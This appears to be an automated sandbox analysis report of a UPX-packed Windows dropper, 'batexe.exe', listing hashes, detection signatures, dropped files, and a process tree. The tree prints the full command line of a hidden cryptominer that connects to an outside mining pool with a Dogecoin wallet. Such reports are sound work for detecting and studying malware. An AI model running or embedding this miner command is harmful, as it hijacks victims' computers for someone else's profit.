73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
300s
max time network
298s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
21-02-2024 02:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1356	b2e.exe
2000	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2000	cpuminer-sse2.exe
2000	cpuminer-sse2.exe
2000	cpuminer-sse2.exe
2000	cpuminer-sse2.exe
2000	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5068-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5068 wrote to memory of 1356	5068	batexe.exe	74
PID 5068 wrote to memory of 1356	5068	batexe.exe	74
PID 5068 wrote to memory of 1356	5068	batexe.exe	74
PID 1356 wrote to memory of 424	1356	b2e.exe	75
PID 1356 wrote to memory of 424	1356	b2e.exe	75
PID 1356 wrote to memory of 424	1356	b2e.exe	75
PID 424 wrote to memory of 2000	424	cmd.exe	78
PID 424 wrote to memory of 2000	424	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5068
- C:\Users\Admin\AppData\Local\Temp\D448.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\D448.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\D448.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D6E7.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:424
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\D448.tmp\b2e.exe

Filesize
8.9MB

MD5
83bd2d3e928ab10231d5518be83f90f8

SHA1
f7db0b89407ba77b6bbe7afefdb9c821aa24d385

SHA256
fe146b627ee0041c3ffed2c55eede6fe6025d627194da1a6503dcd583986c64b

SHA512
b881a4979e301262ecedc43f7c75db341b8b6f56537e45eff527f558b0a4b4fdcf8dbf7b990889ea167f5378fa7fec8dddca874071f47b3801f96bc71a7a12f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\D448.tmp\b2e.exe

Filesize
3.6MB

MD5
2a58aa86deac2c99323c788735dd53af

SHA1
eeac6b8cceb22a47daa1590f4dbae8e3c7c27c92

SHA256
fbd061c4d55ef74a2b1fbefa8f244ffb9e63df4a7f16083d7a9920fee83a0305

SHA512
22598586f1fc5ef20ddc7f840402716a660917caa0f26628eb943928d458688f698e66094d3cf2cd6865baa1b32ba61d1e05103abfafe98e72d30668a6b7ec57

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6E7.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.2MB

MD5
9329fca0baee8b13df35097804674548

SHA1
3227b7f7fb80c5122c852ce09c7ee6d933fdb7be

SHA256
3c599bbce1deb354309f4ed8ca846616face46d99e1e79944aea58f72ac94d1f

SHA512
ae043be9fc9ecfb9d28c5f63f7cf952a0b0a3dc2e7fefd278a071cdde609058dcbbbb94d6e47e7013d200fe44c792e3081a796e4e7d6e52c04e48e58b03343ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
384KB

MD5
eb8ea4d2595402528f73410e2c8651ed

SHA1
23abb385032a9317d00c826eb21e0fe6fc802c50

SHA256
fc3c5c1787c58c465ea47ab132afc59d209b1f7d319ae80a7913ed5c39157017

SHA512
7f4485a662859bdec898bb4f9675c8a834ab570ae7f4df2b6e95a9f5ab45f8fba612d04f0edfe22dc4bdcd3011af0536ed200731262056cd7bec332ce4b18573

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
388KB

MD5
0d27d48eb04764bd53c91f3e652254e9

SHA1
72d5c37fc84e15b984e13aa3386e58804c586a18

SHA256
d4eac97a0a693cc194d0b73bdeb46a306cf101e727e1f64bed499fc892403b61

SHA512
e6fd00153206682d9b6b8b4424d0cd20ed71c1b846fe5f16c46585b97f60480566d3b2511072df7eb94252dc743760d1adbae0040d9e773027b3c2e455d141b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
320KB

MD5
e748e3357af6e4674ff8962691273b0d

SHA1
0acfc30d68a1ef7c6790a79270864448f70f0aa8

SHA256
84ff770c784909548dbca7bd2a24c8e82338b142f2d4893023e25c52f70e8d14

SHA512
0bd15154698983c85b46810d8fef9092f4d0725882421d6db61f168873af967808c467b924dcb8ee72aaad6e10202edab14916580fc442e14b9d8c85f9d07dcc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
209KB

MD5
20f5bc00062ec4b15c9695240f7cbf6c

SHA1
77bb956356d043903ef50dbbf36782f0787c38dc

SHA256
cf0f9af951a1b3140703d2aa85f13f709c0211d73ac2bb902d1e20840b1052a6

SHA512
d40634e8055428b821a67c9b89ce3a21f0a96f8d69330d5fd89791e55fc8df488f99d2e0c6dedf0e2bff357a7480d1ae2d92a90431be27ef5e58ecf3e9f521ff

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
384KB

MD5
d1d1f36cdbccda3b96e8c164afb74526

SHA1
91bafcd404c8568c9a195ec8cbf9592ea9e17e8b

SHA256
ea6e726150aa9a8dcf9ccb6a991440b451f9f2dcc46d93cb35971556879d1d03

SHA512
2306e6578ba2217b4f32913e1ac35e0547723b873c11244e96affd05457945373c621ea16a82e1e3aa1a177e3059efc40c8585118c63a3ea145524c51d1d18c9

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
192KB

MD5
d73b46cd072058efc54c4b3885f47e13

SHA1
84771c2c4f5736ac08497737cba2a8634d9e9178

SHA256
3f62bb203bdcca4e489401897e0558cf33ad6fe890a9987f90f5c3894b965b34

SHA512
519c91b5b5a82c5a755d7d4295c040cfb6b0f029eb088a6bfc428db11e30d7f954ea6fd6de9b083d1781e1142737ea39572866ab5f669848dff7ef0ce34c79c7

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
128KB

MD5
9746d1ac79c8b499d8b2224394581fa7

SHA1
36b1985eabfd8131ad9f2b7f69c903a3fce67629

SHA256
77941fbe96e0c797e6cf5419ee32bd3fcee69629cba37750146656a660c37182

SHA512
61a6174e2aced5b85cd614ad2f9d3da24c6b91e1fc04e10ff818222c4323cd043a59708bd35af0de84b004bf492fbc157d72907cd1e7ddf7082fc2a3563ef183

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
133KB

MD5
213a380cb4e20d2bacc820637e723bf5

SHA1
5b9a2794b6d7bcbc5aeec6c35d52aa1ab2b8b409

SHA256
c98d74f71d4c5134936a1daca5350ed64992bc4b744a07bb0f065332960fb4cf

SHA512
d0b1a1262cd6601be992ad25f9a701a2d1be5277ca4518922fc5d82c41c06a54bb100f32eae2e6500ae84df5c57b0eb9ed215015ac2d5e00a4675d77132fa790

Download Submit
memory/1356-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1356-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2000-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2000-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2000-43-0x0000000069FA0000-0x000000006A038000-memory.dmp

Filesize
608KB

Download
memory/2000-44-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/2000-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5068-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download